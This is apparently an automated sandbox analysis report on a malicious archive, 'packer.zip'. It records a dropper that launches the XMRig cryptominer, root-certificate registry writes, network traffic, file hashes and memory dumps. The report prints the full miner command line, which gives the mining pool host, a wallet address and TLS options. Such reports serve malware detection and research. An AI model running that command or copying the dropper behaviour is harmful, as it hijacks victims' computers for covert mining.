Analysis Overview
SHA256
2712cfc84e57a8c2c3637bc69d65c1741fcb7a600c78709bbe3d47c5f76a4293
Threat Level: Known bad
The file packer.zip was found to be: Known bad.
Malicious Activity Summary
xmrig
XMRig Miner payload
Executes dropped EXE
Unsigned PE
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Modifies system certificate store
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-22 14:46
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral8
Detonation Overview
Submitted
2024-05-22 14:45
Reported
2024-05-22 16:00
Platform
win10v2004-20240508-en
Max time kernel
1794s
Max time network
1791s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4652 wrote to memory of 3496 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4652 wrote to memory of 3496 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.160:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 160.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| NL | 23.62.61.160:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3496-16-0x000002236CED0000-0x000002236CEF0000-memory.dmp
memory/3496-17-0x000002236E6D0000-0x000002236E6F0000-memory.dmp
memory/3496-18-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-19-0x000002236E710000-0x000002236E730000-memory.dmp
memory/3496-20-0x000002236E6F0000-0x000002236E710000-memory.dmp
memory/3496-21-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-22-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-23-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-24-0x000002236E710000-0x000002236E730000-memory.dmp
memory/3496-25-0x000002236E6F0000-0x000002236E710000-memory.dmp
memory/3496-26-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-27-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-28-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-29-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-30-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-31-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-32-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-33-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-34-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-35-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-36-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-37-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-38-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-39-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-40-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-41-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-42-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-43-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-44-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-45-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-46-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-47-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-48-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-49-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-50-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-51-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-52-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-53-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-54-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-55-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-56-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-57-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-58-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-59-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-60-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-61-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-62-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-63-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-64-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-65-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-66-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-67-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-68-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-69-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-70-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-71-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-72-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-73-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-74-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-75-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-76-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-77-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-78-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-79-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-80-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-81-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-82-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-83-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
memory/3496-84-0x00007FF7245F0000-0x00007FF7250F3000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2024-05-22 14:45
Reported
2024-05-22 16:00
Platform
win10v2004-20240426-en
Max time kernel
1792s
Max time network
1803s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1084 wrote to memory of 2572 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1084 wrote to memory of 2572 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.73.50.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2572-16-0x000001B947F90000-0x000001B947FB0000-memory.dmp
memory/2572-17-0x000001B947FD0000-0x000001B947FF0000-memory.dmp
memory/2572-18-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-20-0x000001B947FF0000-0x000001B948010000-memory.dmp
memory/2572-19-0x000001B9DA9C0000-0x000001B9DA9E0000-memory.dmp
memory/2572-21-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-22-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-25-0x000001B947FF0000-0x000001B948010000-memory.dmp
memory/2572-24-0x000001B9DA9C0000-0x000001B9DA9E0000-memory.dmp
memory/2572-23-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-26-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-27-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-28-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-29-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-30-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-31-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-32-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-33-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-34-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-35-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-36-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-37-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-38-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-39-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-40-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-41-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-42-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-43-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-44-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-45-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-46-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-47-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-48-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-49-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-50-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-51-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-52-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-53-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-54-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-55-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
memory/2572-56-0x00007FF7778F0000-0x00007FF7783F3000-memory.dmp
